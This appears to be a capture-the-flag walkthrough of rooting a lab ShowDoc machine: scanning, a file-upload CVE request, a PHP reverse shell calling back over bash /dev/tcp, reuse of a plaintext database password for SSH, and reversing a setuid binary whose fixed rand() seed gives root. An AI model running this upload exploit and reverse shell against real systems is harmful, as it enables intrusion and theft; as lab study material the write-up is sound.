Related: target machine notes, common commands, privilege escalation overview

Host discovery

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sn 10.241.108.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 16:51 CST
Nmap scan report for 10.241.108.8
Host is up (0.0012s latency).
MAC Address: 08:00:27:35:21:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 10.241.108.43
Host is up (0.011s latency).
MAC Address: 4E:20:31:25:4A:3C (Unknown)
Nmap scan report for 10.241.108.212
Host is up (0.00060s latency).
MAC Address: 30:E3:A4:48:AC:29 (Unknown)
Nmap scan report for 10.241.108.201
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.08 seconds

Target IP confirmed: 10.241.108.8 (I later noticed the challenge gives you the IP anyway).

Port scanning

┌──(kali㉿kali)-[~/桌面]
└─$ nmap   10.241.108.8 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 16:54 CST
Nmap scan report for 10.241.108.8
Host is up (0.0045s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:35:21:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
 
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

  • Port 80 (web) is open

Web exploitation

Having found a web port, I browsed to it first: it is a ShowDoc site, so most likely a stock open-source codebase. I asked an AI directly, found the CVE, and went looking for a PoC: vulhub/showdoc/CNVD-2020-26585 at master · vulhub/vulhub · GitHub. PoC:

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Length: 213
 
------WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
 
<?=phpinfo();?>
------WebKitFormBoundary0RdOKBR8AmAxfRyl--

Change the Host header and send the request. Sure enough, the response returns the upload path, so the vulnerability is present and we can move on to a reverse shell.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvp 7777       
listening on [any] 7777 ...
 
Replace the payload with:
<?php exec('bash -c "bash -i >& /dev/tcp/10.241.108.201/7777 0>&1" &'); ?>
 
 

After uploading, visit the returned URL and the shell comes back.

Getting user

Right now we only have the lowest-privilege www-data account, so first take a look at the users:

www-data@Show:~/html/Sqlite$ ls -l /home
ls -l /home
total 8
drwx------ 2 l1qin9 l1qin9 4096 Apr 25 22:47 l1qin9
drwx------ 2 mooi   mooi   4096 Apr 25 20:09 mooi
 

There are two users, both with the same permissions.

Then, poking through the directories, I found /html/Sqlite/showdoc.db.php, a SQLite database file. Let's see whether credentials are stored in it: start a Python HTTP server, download the file, and open it in Navicat.

# target shell:
www-data@Show:~/html/Sqlite$ python3 -m http.server 8080
python3 -m http.server 8080
# local shell:
PS D:\webtool\Dirsearch> curl http://10.241.108.8:8080/showdoc.db.php -O "showdoc.db.php"

Opening it shows my own user and a showdoc entry, but unfortunately the passwords are hashed and cmd5 could not crack them, so we have to keep looking. Let's search for configuration files.

www-data@Show:~/html$ find . -name "*conf*"   
find . -name "*conf*"
./web_src/test/e2e/nightwatch.conf.js
./web_src/test/unit/jest.conf.js
./web_src/build/webpack.base.conf.js
./web_src/build/webpack.prod.conf.js
./web_src/build/webpack.dev.conf.js
./web_src/build/vue-loader.conf.js
./web_src/config
./web_src/.editorconfig
./server/Application/Common/Conf/config.php
./server/Application/Api/Conf/config.php
./server/Application/Home/Conf/config.php
 

I looked at the PHP files first.

www-data@Show:~/html$ cat server/Application/Common/Conf/config.php
cat server/Application/Common/Conf/config.php
<?php
return array(
    //'config key'=>'config value'
    //use the SQLite database
    'DB_TYPE'   => 'Sqlite', 
    'DB_NAME'   => '../Sqlite/showdoc.db.php', 
    //showdoc no longer supports mysql http://www.showdoc.cc/help?page_id=31990
    'DB_HOST'   => 'localhost',
    'DB_USER'   => 'showdoc', 
    'DB_PWD'    => 'showdoc123456',
    'DB_PORT'   => 3306, // port
    'DB_PREFIX' => '', // table prefix
    'DB_CHARSET'=> 'utf8', // charset
    'DB_DEBUG'  =>  TRUE, // database debug mode; when on, SQL logs are recorded
    'URL_HTML_SUFFIX' => '',//URL pseudo-static suffix
    'URL_MODEL' => 3 ,//URL compatibility mode
    'URL_ROUTER_ON'   => true, 
    'URL_ROUTE_RULES'=>array(
        ':id\d'               => 'Home/Item/show?item_id=:1',
        ':domain\s$'               => 'Home/Item/show?item_domain=:1',//item's custom domain
        'uid/:id\d'               => 'Home/Item/showByUid?uid=:1',
        'page/:id\d'               => 'Home/Page/single?page_id=:1',
    ),
    'URL_CASE_INSENSITIVE'=>true,
    'SHOW_ERROR_MSG'        =>  true,    // show error messages, so errors are displayed even in deployment mode
    'STATS_CODE' =>'',  //optional, analytics code
    'TMPL_CACHE_ON' => false,//disable template compile cache
    'HTML_CACHE_ON' => false,//disable static cache
    'TMPL_EXCEPTION_FILE' => '../Public/exception.tpl' , //error template
    //config for uploading files to Qiniu
    'UPLOAD_SITEIMG_QINIU' => array(
                    'maxSize' => 5 * 1024 * 1024,//file size
                    'rootPath' => './',
                    'saveName' => array ('uniqid', ''),
                    'driver' => 'Qiniu',
                    'driverConfig' => array (
                            'secrectKey' => '', 
                            'accessKey' => '',
                            'domain' => '',
                            'bucket' => '', 
                        )
                    ),
);

That reveals the showdoc database user's password directly. Let's try it and see whether the password is reused for a system account.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mooi@10.241.108.8  
The authenticity of host '10.241.108.8 (10.241.108.8)' can't be established.
ED25519 key fingerprint is SHA256:MjoUe5ON03T2UcSPmlU3evmpGUywqf/3IUm0+1p77cI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.241.108.8' (ED25519) to the list of known hosts.
mooi@10.241.108.8's password: 
Linux Show 6.12.73+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.73-1 (2026-02-17) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 25 07:14:32 2026 from 192.168.193.14
mooi@Show:~$ ls
user.txt
mooi@Show:~$ cat user.txt 
flag{user-f5ce64ad520f46e2bcb1dc94dbb6dbd3}
 

Getting root

After finding the user flag there was nothing else of interest for the mooi user. Moving on to the other user, l1qin9, I found an executable; first instinct is to just run it.

l1qin9@Show:~$ ls
auth_monitor
l1qin9@Show:~$ ./auth_monitor 
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777378524
CHALLENGE_STAMP: ccc20fe7
ENTER ACCESS CODE: 
 

It asks for an ACCESS CODE. Either brute-force it or reverse it.

Reversing

Same as before: start a Python HTTP server and download it.

l1qin9@Show:~$ python3 -m http.server 8081
 
PS D:\webtool\Dirsearch> curl http://10.241.108.8:8081/auth_monitor -O "auth_monitor"

Drag it into IDA and press F5 to decompile:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ebx
  time_t v4; // rax
  char s[256]; // [rsp+10h] [rbp-130h] BYREF
  int v7; // [rsp+110h] [rbp-30h] BYREF
  unsigned int buf; // [rsp+114h] [rbp-2Ch] BYREF
  FILE *stream; // [rsp+118h] [rbp-28h]
  int v10; // [rsp+120h] [rbp-20h]
  int fd; // [rsp+124h] [rbp-1Ch]
  int i; // [rsp+128h] [rbp-18h]
  unsigned int v13; // [rsp+12Ch] [rbp-14h]
 
  fd = open("/dev/urandom", 0, envp);
  if ( fd < 0 )
  {
    v3 = time(0LL);
    buf = v3 ^ getpid();
  }
  else
  {
    read(fd, &buf, 4uLL);
    close(fd);
  }
  v13 = 0;
  for ( i = 0; i <= 99; ++i )
  {
    v13 += buf % (i + 1);
    v13 ^= **argv;
  }
  s0rand(v13);
  v10 = rand();
  puts("--- MAZE-SEC ACCESS MONITOR ---");
  v4 = time(0LL);
  printf("SYSTEM_TICK: %ld\n", v4);
  printf("CHALLENGE_STAMP: %08x\n", buf);
  printf("ENTER ACCESS CODE: ");
  if ( (unsigned int)__isoc99_scanf("%d", &v7) != 1 )
    return 1;
  if ( v10 == v7 )
  {
    setuid(0);
    setgid(0);
    stream = fopen("/root/show.txt", "r");
    if ( stream )
    {
      while ( fgets(s, 256, stream) )
        printf("%s", s);
      fclose(stream);
    }
  }
  else
  {
    puts("ACCESS DENIED.");
  }
  return 0;
}

Roughly, the logic is:

  1. A fairly complicated routine produces v13.
  2. v13 is passed to s0rand.
  3. We enter v7; v10 is a pseudo-random number, with v13 as the seed.
  4. If the random number equals our input, we get the root password.

It looks complicated, but stepping into s0rand we find:

void s0rand()
{
  srand(0x539u);
}

s0rand takes no parameter at all, so the seed is always the constant 0x539. That makes the expected code trivial to compute. Exploit:

#include <stdio.h>
#include <stdlib.h>
 
int main() {
    srand(0x539);
    printf("固定的预测码是: %d\n", rand());
    return 0;
}
 
// Prints the fixed access code: 292616681

Just generate it with the same logic; any online C compiler will do.
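To make the point of the decompilation concrete, here is an added example (my own code, not the challenge binary and not the exp above). It replicates the seed-derivation loop from the decompiled main() and compares what auth_monitor actually does (s0rand() ignoring v13 and calling srand(0x539)) with what it would have done had the derived seed been used. The function names, and the assumption that argv[0] is "./auth_monitor", are mine; the two CHALLENGE_STAMP values are the ones shown in the runs above.

```c
/* Added example: why auth_monitor's access code is predictable.
 * The binary derives v13 from CHALLENGE_STAMP and argv[0], but s0rand()
 * ignores it and seeds rand() with the constant 0x539, so the "challenge"
 * never changes the answer. Function names are my own. */
#include <stdio.h>
#include <stdlib.h>

/* Replicates the seed derivation loop from the decompiled main():
 * v13 += stamp % (i+1); v13 ^= argv[0][0]   for i in 0..99.
 * argv0[0] is converted like the binary's signed char (sign-extended). */
unsigned int derive_seed(unsigned int stamp, const char *argv0)
{
    unsigned int v13 = 0;
    for (int i = 0; i <= 99; ++i) {
        v13 += stamp % (unsigned int)(i + 1);
        v13 ^= (unsigned int)argv0[0];
    }
    return v13;
}

/* The access code as auth_monitor actually computes it: s0rand() calls
 * srand(0x539) no matter what was derived, so for a given libc this is a
 * constant (292616681 on glibc, per the writeup). */
int access_code_as_shipped(unsigned int derived_seed)
{
    (void)derived_seed;   /* ignored, exactly as s0rand() ignores v13 */
    srand(0x539);
    return rand();
}

/* What the program presumably intended: seed with the derived value.
 * The answer now at least depends on the stamp. */
int access_code_if_seed_used(unsigned int derived_seed)
{
    srand(derived_seed);
    return rand();
}

int main(void)
{
    /* The two stamps printed in the runs shown in the writeup. */
    unsigned int stamps[2] = { 0xccc20fe7u, 0xb77f8146u };
    for (int k = 0; k < 2; ++k) {
        unsigned int seed = derive_seed(stamps[k], "./auth_monitor");
        printf("stamp %08x -> derived seed %08x\n", stamps[k], seed);
        printf("  shipped (srand(0x539)):    %d\n", access_code_as_shipped(seed));
        printf("  if derived seed were used: %d\n", access_code_if_seed_used(seed));
    }
    return 0;
}
```

Running it prints the same "shipped" number for both stamps, which is the whole bug. Note that even the variant that honours the derived seed would be weak: the stamp is printed to the user and argv[0] is known, so anyone can recompute the seed and the first rand() output, and rand() is not a cryptographic generator in any case. A setuid gate like this needs to compare against a secret that cannot be reconstructed from what the program itself reveals.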

l1qin9@Show:~$ ./auth_monitor
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777378013
CHALLENGE_STAMP: b77f8146
ENTER ACCESS CODE: 292616681
1NOjcN9b9uqUJ0VPYbgi
 
 
l1qin9@Show:~$ su 
Password: 
root@Show:/home/l1qin9# ls
auth_monitor
root@Show:/home/l1qin9# cd /root
root@Show:~# ls
root.txt  show.txt
root@Show:~# cat root.txt
flag{root-64f26bcf00751fcbe2d03d5a7d7c93ef}
 

And that's the box fully compromised.